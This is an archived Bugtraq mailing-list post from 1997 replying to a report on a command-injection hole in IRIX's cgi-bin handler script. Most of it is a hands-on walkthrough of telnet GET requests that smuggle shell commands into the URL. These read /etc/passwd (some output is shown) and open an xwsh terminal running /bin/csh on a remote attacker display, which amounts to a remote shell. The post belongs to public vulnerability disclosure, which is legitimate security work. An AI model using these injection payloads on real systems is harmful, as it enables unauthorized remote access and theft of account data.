Home page logo
/

bugtraq logo Bugtraq mailing list archives

Re: CPSR 7: IRIX WWW Server
From: balu () STUDST FH-MUENSTER DE (Thomas Walter)
Date: Thu, 24 Jul 1997 17:51:56 +0200


Hiho...

[Corinne Posse Relaeses wrote]
Quite a while ago, Razvan Dragomirescu (drazvan () kappa ro) released a
report on the default cgi-handler scripts that ship with IRIX systems
with web servers, and some other web server programs. Just like with
the phf bug, with the cgi-handler bug a malicious user could start
an xterm from the server machine on their own system.

Example:

telnet www.highly.respectable.bank.com 80
Trying 300.300.300.1...
Connected to www.highly.respectable.bank.com
Escape character is '^]'.
GET /cgi-bin/handler/blah;xwsh  -display   yourhost.com|?data=Download

Please note the format of the "GET" query. The above assumes xwsh is
in the
PATH somewhere, and the "space" between "xwsh" and "-display" sould be
a TAB.

I've got some problems while trying that...
First it seems, that the xwsh was not in the path so I tried to call
xwsh with a given path (note that all whitespaces after GET
/cgi-bin/handler/ must be Tabs...):

enemy% telnet victim 80
Trying 1.2.3.4...
Connected to victim.
Escape character is '^]'.
GET /cgi-bin/handler/ ;/usr/sbin/xwsh  -display  enemy:0|?data=Download
UX:sh (sh): ERROR: Connection closed by foreign host.
enemy%

That opened the xwsh window... But there was only one error-message in
the first line:

/usr/sbin/xwsh: Permission denied: can't start command

Hm - What could that be? Doesn't matter - Lets see what I can do with
other commands... (Remember the tabs...)

enemy% telnet victim 80
Trying 1.2.3.4...
Connected to victim.
Escape character is '^]'.
GET /cgi-bin/handler/   ;cat    /etc/passwd|?data=Download
UX:sh (sh): ERROR: root:x:0:0:Super-User:/:/bin/csh
sysadm:x:0:0:System V Administration:/usr/admin:/bin/sh
[... I wont give you that ;) ...]
nobody:x:60001:60001:SVR4 nobody uid:/dev/null:/dev/null
[... and again some more ...]
Connection closed by foreign host.

Hm - a shadowed passwd... was my first thought... Lets see If I can get
the shadow... [As above] - Didnt work. So It seems that the WWWserver
was not running as root (what a pity ;). If it does not run as root - it
usually runs as nobody. And what can we see above? Nobody got the shell
/dev/null - thats why my xwsh was not able to start a command. Next Try
was to give xwsh the command that it should start... (And again: Tabs! -
and of course everything in one line...)

enemy% telnet victim 80
Trying 1.2.3.4...
Connected to victim.
Escape character is '^]'.
GET /cgi-bin/handler/;/usr/sbin/xwsh  -display  enemy:0  -e
/bin/csh|?data=Download
UX:sh (sh): ERROR: Connection closed by foreign host.
enemy%

And voila! - What else do you want? Any other programs to start? Just
try...

Brgds
     Balu
--
                                                            /'^'\
Please note: english is not my mother tongue               ( o o )
-------------------------------------------------------oOOO--(_)--OOOo
E-Mail: balu () studst fh-muenster de
Snail Mail: Thomas Walter
            Wemhoefer Stiege 10a, 48565 Burgsteinfurt   .oooO
or          Broxtermannstr.12, 49082 Osnabrueck, GERMANY(   )   Oooo.
---------------------------------------------------------\ (----(   )-
                                                          \_)    ) /
                                                                (_/



  By Date           By Thread  

Current thread:
[ Nmap | Sec Tools | Mailing Lists | Site News | About/Contact | Advertising | Privacy ]
AlienVault